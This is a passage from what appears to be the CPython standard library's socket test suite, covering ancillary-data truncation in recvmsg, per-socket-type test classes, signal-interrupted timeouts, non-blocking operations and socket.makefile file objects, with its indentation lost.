@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
self.addCleanup(self.setAlarm, 0)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
@unittest.skipUnless(thread, 'Threading required for this test.')
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
@unittest.skipUnless(thread, 'Threading required for this test.')
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
